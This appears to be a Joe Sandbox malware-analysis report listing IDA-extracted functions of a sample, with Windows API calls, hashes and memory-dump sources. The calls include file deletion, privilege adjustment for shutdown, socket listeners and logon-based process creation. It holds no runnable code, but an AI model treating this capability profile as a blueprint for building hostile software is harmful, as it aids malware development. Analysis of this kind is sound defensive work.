                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
                                                            • Instruction ID: 388de0495d87e7e9b1ff12d022555345d6957dc027297568e53c15a5af3a34dd
                                                            • Opcode Fuzzy Hash: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
                                                            • Instruction Fuzzy Hash: 26417B7180021AAFCF16EF64CC45BEEBBB9FF05310F20456AE915A6190DB309E84CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID: 3c7$_7
                                                            • API String ID: 674341424-4188345352
                                                            • Opcode ID: 875c4e6c01837f533c2db754b3ca567a8983a91234693bf9b6258eebe60587f5
                                                            • Instruction ID: 4396b301f9ebcb378ce8d23b85c0be8ce73baa1e8d0e06f3d8945e85b43cdab7
                                                            • Opcode Fuzzy Hash: 875c4e6c01837f533c2db754b3ca567a8983a91234693bf9b6258eebe60587f5
                                                            • Instruction Fuzzy Hash: F022AF716083009FD726DF24C881BAFB7E8EF85714F04891DF59A9B291DB75E904CB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: e2706926b7adba2e315d824fa44313b56b81242704e5db7a80f94dde88b20e3c
                                                            • Instruction ID: 55de2f476eace020f7a57870936593ca772753d4b4c49dd93a55a4e120328e2d
                                                            • Opcode Fuzzy Hash: e2706926b7adba2e315d824fa44313b56b81242704e5db7a80f94dde88b20e3c
                                                            • Instruction Fuzzy Hash: 4D129C70A00609EFCF19DFA4D981AEEB7F5FF48304F108569E44AEB650EB39A914CB50
                                                            APIs
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                              • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003C3B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 003C3BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C3BEA
                                                            • FindClose.KERNEL32(00000000), ref: 003C3C01
                                                            • FindClose.KERNEL32(00000000), ref: 003C3C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
                                                            • Instruction ID: bbc303e0f1f06f5e70bf642a146e3d5e7798f2cf3b2265c04baa291a3e5b843e
                                                            • Opcode Fuzzy Hash: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
                                                            • Instruction Fuzzy Hash: DF316D350083859FC312EB24C891DAFB7E8AE95304F408E2DF4D59A191EB21DE08CB67
                                                            APIs
                                                              • Part of subcall function 003B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
                                                              • Part of subcall function 003B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
                                                              • Part of subcall function 003B87E1: GetLastError.KERNEL32 ref: 003B8865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 003C51F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
                                                            • Instruction ID: 9a056b0ed1bf8762705fc0b9135c59211e9e63300703fe58e0b8c2724b274abc
                                                            • Opcode Fuzzy Hash: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
                                                            • Instruction Fuzzy Hash: 7E01F7316916156BF72A62689C8BFBB72DC9B05350F250D2DF913EA4D2DA917C808790
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: pbB$%?
                                                            • API String ID: 3964851224-3075198358
                                                            • Opcode ID: 8e39aaef128388568b39ee7f4642ed0b614b2d30458f374ce3b565decf8c9ffe
                                                            • Instruction ID: 5b63de59d6533bafd43b3b7282b03c8ca80ff3849b0f20d53225f72840a14503
                                                            • Opcode Fuzzy Hash: 8e39aaef128388568b39ee7f4642ed0b614b2d30458f374ce3b565decf8c9ffe
                                                            • Instruction Fuzzy Hash: 73927874608341CFD726DF24C480B2AB7E4FF89304F15896DE89A9B262D775EC45CB92
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003D62DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D62EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 003D6307
                                                            • listen.WSOCK32(00000000,00000005), ref: 003D6316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D6330
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 003D6344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
                                                            • Instruction ID: d11df50490c904097e89bfbf57c3595d6cd76563e81eb792cea51377425fa059
                                                            • Opcode Fuzzy Hash: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
                                                            • Instruction Fuzzy Hash: 6321D5756002009FCB12EF64D886B6EB7ADEF49310F15825AE926AB3E1C770AD01CB51
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 003B8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
                                                            • Instruction ID: 8e2ffa918cedae5555949bee5920ee5d7d5cdcacade38d2f3394287cee096c67
                                                            • Opcode Fuzzy Hash: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
                                                            • Instruction Fuzzy Hash: 4B11387250124DAFDF128FA4DD49BEA7BADEB48348F054165BE04A61A0C6719E60DB60
                                                            APIs
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • _memmove.LIBCMT ref: 003B0258
                                                            • _memmove.LIBCMT ref: 003B036D
                                                            • _memmove.LIBCMT ref: 003B0414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 2678823e90e9a4ad0b30de84de6c1186d2601501b9c6866a47e69e2f70bf5f5c
                                                            • Instruction ID: e7030ff1f551176c258e9db48c84a047f9f8206b150366991dba1e60659b671b
                                                            • Opcode Fuzzy Hash: 2678823e90e9a4ad0b30de84de6c1186d2601501b9c6866a47e69e2f70bf5f5c
                                                            • Instruction Fuzzy Hash: 6902D070A00209DBCF1ADF64D981AAEBBF5EF44304F14C4A9E90ADF255EB34DA54CB91
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 003619FA
                                                            • GetSysColor.USER32(0000000F), ref: 00361A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00361A61
                                                              • Part of subcall function 00361290: DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
                                                            • Instruction ID: 5f907445d8b3ffbbaab8e8a951601563a118acfc099c7982cf3abef1332a4d54
                                                            • Opcode Fuzzy Hash: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
                                                            • Instruction Fuzzy Hash: 2BA19B70112594BEEA3BAB69DC48EBF259CDB42346F1E8219F402DA5DACB208D01C2B5
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003CBCE6
                                                            • _wcscmp.LIBCMT ref: 003CBD16
                                                            • _wcscmp.LIBCMT ref: 003CBD2B
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 003CBD3C
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003CBD6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 2387731787-0
                                                            • Opcode ID: bb389f2f08e2890cacb3d44a86766105db13a4f72c9077757f4fe100fa4f7a9c
                                                            • Instruction ID: a28b72589f62ce949d1e81ff5d2af9274ee34454c1970978260331c5cdc68111
                                                            • Opcode Fuzzy Hash: bb389f2f08e2890cacb3d44a86766105db13a4f72c9077757f4fe100fa4f7a9c
                                                            • Instruction Fuzzy Hash: 3251AB75A047029FC716DF28C495EAAB3E8EF4A320F00465EE956CB3A1CB30ED04CB91
                                                            APIs
                                                              • Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003D7DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003D679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D67C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 003D6800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D680D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 003D6821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
                                                            • Instruction ID: f7413fc8082be1498eb8ad028a30d2440433fbefae96ce790256fa8871ef1598
                                                            • Opcode Fuzzy Hash: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
                                                            • Instruction Fuzzy Hash: 4341C375A00214AFDB12AF64DC87F6E77EC9B09754F04C55AF91AAF3D2CA709D0087A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
                                                            • Instruction ID: ab493fdfef19afc6c91880952be4fb18116df50b1c30f69a898f0d8ad58c1521
                                                            • Opcode Fuzzy Hash: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
                                                            • Instruction Fuzzy Hash: B111B6717009A19FDB235F279C84B6ABB9CEF457A5B418529F845DB2C1CBB09C018AA4
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
                                                            • Instruction ID: 0e6a5faadfd1cc10f6bfeee04cec6bd4e66f3864c200580fcf4f2a09bd990e2f
                                                            • Opcode Fuzzy Hash: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
                                                            • Instruction Fuzzy Hash: 53F06835241244AFD7224F65DCCDEA73BACEF85759F010125F645C6190CBA1DD41DA60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DdB$DdB$DdB$DdB$Variable must be of type 'Object'.
                                                            • API String ID: 0-4073077587
                                                            • Opcode ID: 7027eb90014bfc44cc27a51be1f1ccd0fe0d936f7abc8ccd3ff844badd4f3329
                                                            • Instruction ID: 324cfab5ffee2a3f24db67aa02fc8c37d1779d7524ce526840952430082b1250
                                                            • Opcode Fuzzy Hash: 7027eb90014bfc44cc27a51be1f1ccd0fe0d936f7abc8ccd3ff844badd4f3329
                                                            • Instruction Fuzzy Hash: 3CA2C178A00215CFCB26CF98C480AAEB7B5FF59310F65C069E805AB359D775ED4ACB90
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00364AD0), ref: 00364B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00364B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
                                                            • Instruction ID: 690784e3201b56e1d8f5fc11a7d29827e168ee9fc23a4fcac2b2af2602a963a6
                                                            • Opcode Fuzzy Hash: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
                                                            • Instruction Fuzzy Hash: 0CD01234E10767CFDB229F32D858B4676D8AF45351F11C93DD4C6DA190D6B0D480C654
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 003DEE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 003DEE4B
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 003DEF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003DEF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
                                                            • Instruction ID: 1110e38078146f551e7dd7c6d5b85c7e31b673d92016d8ab95c851c1d41bdb9d
                                                            • Opcode Fuzzy Hash: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
                                                            • Instruction Fuzzy Hash: 435171725043119FD322EF24DC81E6BBBE8EF94750F50892DF5959B2A1DB70A904CB92
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003BE628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: cb5a36b76afdb26b52abeb65d39e015ea806475f284262b4fcb0203a4c19d0a2
                                                            • Instruction ID: ddeb71de55b567756b80559fecca5180ae7c1a16f6756a7d1276b82c98d416dd
                                                            • Opcode Fuzzy Hash: cb5a36b76afdb26b52abeb65d39e015ea806475f284262b4fcb0203a4c19d0a2
                                                            • Instruction Fuzzy Hash: C6324675A007059FD729CF19C481AAAB7F0FF48314B12C56EE99ADB7A1EB70E941CB40
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003D180A,00000000), ref: 003D23E1
